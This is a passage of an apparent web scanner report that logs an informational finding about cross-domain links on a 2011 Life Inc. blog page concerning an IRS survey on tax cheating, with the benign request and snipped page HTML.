<div class="normal"><a href="http://DMC2990950.newsvine.com/">DMC-2990950</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star18" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://JimHenigman.newsvine.com/">Jim Henigman</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Zarkon.newsvine.com/">Steve-1309027</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star19" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Haste502.newsvine.com/">Haste502</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BillMarvell.newsvine.com/">Bill Marvell</a>
...[SNIP]...
<div class="normal"><a href="http://add42162.newsvine.com/">Tony-353256</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://johnthefree.newsvine.com/">jed233</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://TWL.newsvine.com/">Azrancher</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://benlam1.newsvine.com/">JobSeeker</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://roger-4.newsvine.com/">Roger Walsh-477587</a>
...[SNIP]...
<div class="normal"><a href="http://msk2877762.newsvine.com/">msk-2877762</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://bertfw.newsvine.com/">Bertfw</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://benlam1.newsvine.com/">JobSeeker</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star20" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeBrooks.newsvine.com/">Mike Brooks</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://johnthefree.newsvine.com/">jed233</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://n-wentworth.newsvine.com/">Rubytuesday57</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n-wentworth.newsvine.com/">Rubytuesday57</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://roger-4.newsvine.com/">Roger Walsh-477587</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://jerry194283.newsvine.com/">jerry194283</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://TrudyP.newsvine.com/">Trudy P</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://settersperch.newsvine.com/">settersperch</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://yankinyerchain.newsvine.com/">yankinyerchain</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpcyphers.newsvine.com/">Cyphers</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
<div class="avatar"><a href="http://allison-linnmsnbc.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/allison-linnmsnbc-846208182.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://www.evetahmincioglu.com/web/blog/">Career Diva</a>
...[SNIP]...
<li><a href="http://blogs.consumerreports.org/money/">Consumer Reports Money</a>
...[SNIP]...
<li><a href="http://norris.blogs.nytimes.com/">Floyd Norris</a>
...[SNIP]...
<li><a href="http://www.ritholtz.com/blog/">The Big Picture</a>
...[SNIP]...
<li><a href="http://consumerist.com/">The Consumerist</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/juggle/">The Juggle</a>
...[SNIP]...
<li><a href="http://www.suddenlyfrugal.com/">Suddenly Frugal</a>
...[SNIP]...
<li><a href="http://blogs.consumerreports.org/baby/">Consumer Reports Baby & Kids</a>
...[SNIP]...
<li><a href="http://www.economist.com/blogs/freeexchange">The Economist Free Exchange</a>
...[SNIP]...
<li><a href="http://bucks.blogs.nytimes.com/">Bucks</a></li><li><a href="http://blog.penelopetrunk.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://onthejob.45things.com/">On the Job</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo">Want more Life Inc.? Follow me on <a href="http://twitter.com/alinnmsnbc">Twitter</a>, check us out on <a href="http://www.facebook.com/home.php?#!/pages/Life-Inc/135937546449321?ref=ts">Facebook</a>
...[SNIP]...
<li><a href="http://moms.today.com/">TODAY Moms</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted">msnbc.com</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/32027560">About us</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/32359544/">Contact</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/3303511/">Help</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/html/HtmlSitemap0.html">Site map</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/27365695/">Careers</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/3303540/">Terms &amp; Conditions</a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/26613008/">Advertise</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.101. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifeinc.todayshow.com
Path:   /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001 HTTP/1.1
Host: lifeinc.todayshow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=109
Date: Sun, 30 Jan 2011 16:49:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140208

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Life Inc. - Good Graph Fr
...[SNIP]...
<meta name="contentId" content="5936478" />
<link rel="shortcut icon" href="https://lib.newsvine.com/chrome/today/images/favicon.ico" type="image/x-icon" />
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://lifeinc.todayshow.com/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e2a5a79d215988ddb0f116d757365d6a810c2d2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/d1e431bda25a167e695fb05acc6e0492371d9a89.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/todaymartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/lifeinc/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5936478&amp;rand=1914872294&amp;do=todayshow.com&amp;rf=http%3A%2F%2Fwww.redacted%2F&amp;ad=68:68:279;44::;70:70:276;68:68:279;74:74:278" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i1"><a href="http://autos.msn.com/">Autos</a>
...[SNIP]...
<li class="i2"><a href="http://my.redacted/">My MSN</a>
...[SNIP]...
<li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a>
...[SNIP]...
<li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a>
...[SNIP]...
<li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i10"><a href="http://zone.redacted/en-us/home">Games</a>
...[SNIP]...
<li class="i11"><a href="http://realestate.redacted/">Real Estate</a>
...[SNIP]...
<li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a>
...[SNIP]...
<li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i15"><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li class="i16"><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li class="i17"><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="i21"><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i1">
               <a href="http://www.msnbc.redacted/" class="site-msnbc">msnbc.com</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i7 show-thelastword"><a href="http://thelastword.msnbc.redacted/">The Last Word</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a><a href="http://today.msnbc.redacted/" class="homelink"></a>
...[SNIP]...
<br />Life Inc. is about how the economy is affecting you: your life, your job, your family, your finances, your spending. Check us out on <a href="http://www.facebook.com/pages/Today-Money/152222541478430">Facebook</a> or follow us on <a href="http://twitter.com/todaymoney">Twitter.</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://lifeinc.todayshow.com/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/pages/Today-Money/152222541478430" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5940862" data-contentId="5940862" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:500px;"><img id="allison-linnmsnbc/5940862.jpg" src="http://www.polls.newsvine.com/_vine/images/users/500/allison-linnmsnbc/5940862.jpg" width="500" height="285" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">survey of 1,000 Americans</a>
...[SNIP]...
<p>Update: A reader points out that the study was done by the <a target="_blank" href="http://www.treasury.gov/irsob/">IRS Oversight Board</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/sm-mail.png" alt="Send idea"/></span>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Facebook-icon2.gif" alt="Facebook" width="16" height="16"/></span> <a href="http://www.facebook.com/todaymoney">Follow us on Facebook</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Twitter-icon2.gif" alt="Twitter" width="16" height="16"/></span> <a href="http://twitter.com/todaymoney/">Follow us on Twitter</a>
...[SNIP]...
<span class="ocicon"><img src="http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/alert.gif" alt="E-mail alerts" width="16" height="16"/></span> <a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">Sign up for e-mail alerts</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="todaymoney" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never" data-Text="Good Graph Friday: What? Cheat on taxes? Never">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://agbroadhurst.newsvine.com/">Arthur G. Broadhurst</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BorsiaII.newsvine.com/">Borsia-II</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smmfdmh.newsvine.com/">smmfdmh</a>
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">IRS survey of 1,000 Americans</a>
...[SNIP]...
<p>An <a target="_blank" href="http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf">IRS survey of 1,000 Americans</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="nbc"><a href="http://allison-linnmsnbc.newsvine.com/">Allison Linn</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smellyloretta.newsvine.com/">Gregorovich</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cygnus-x-1.newsvine.com/">Cygnus_X-1</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<p><a href="http://cygnus-x-1.newsvine.com/">Cygnus_X-1</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://peteroid69.newsvine.com/">Peteroid</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://IHATETHEGOVT.newsvine.com/">I HATE THE GOVT!!</a>
...[SNIP]...
<div class="normal"><a href="http://BorsiaII.newsvine.com/">Borsia-II</a>
...[SNIP]...
<div class="normal"><a href="http://alice-mc.newsvine.com/">Alice Mc</a>
...[SNIP]...
<div class="normal"><a href="http://curious-1.newsvine.com/">craig speakman</a>
...[SNIP]...
<div class="normal"><a href="http://elmerharmon.newsvine.com/">ELH-602027</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Ann1638814.newsvine.com/">Ann-1638814</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cschick2317.newsvine.com/">cschick2317</a>
...[SNIP]...
<div class="normal"><a href="http://stevenkatz2.newsvine.com/">Steven Katz</a>
...[SNIP]...
<div class="normal"><a href="http://Debi-1314897.newsvine.com/">Debi-1314897</a>
...[SNIP]...
<div class="normal"><a href="http://teapartyfan.newsvine.com/">tea-party-fan</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://rick--ws--nc.newsvine.com/">Rick, WS, NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://trust2112.newsvine.com/">Michael Coats</a>
...[SNIP]...
<div class="normal"><a href="http://DMC2990950.newsvine.com/">DMC-2990950</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://bill-horin.newsvine.com/">Bill Horin</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Becky2120568.newsvine.com/">Becky-2120568</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://knightrider3.newsvine.com/">knightrider-2370569</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<div class="normal"><a href="http://thesenatehealth.newsvine.com/">keith n</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://sukdu.newsvine.com/">Sue-612917</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fredevil.newsvine.com/">Fred Evil</a>
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<p><a href="http://sukdu.newsvine.com/">Sue-612917</a>
...[SNIP]...
<div class="normal"><a href="http://bday.newsvine.com/">Beth-440386</a>
...[SNIP]...
<div class="normal"><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Takethatback.newsvine.com/">Take that back.</a>
...[SNIP]...
<div class="normal"><a href="http://smoss73.newsvine.com/">Pondering-1159100</a>
...[SNIP]...
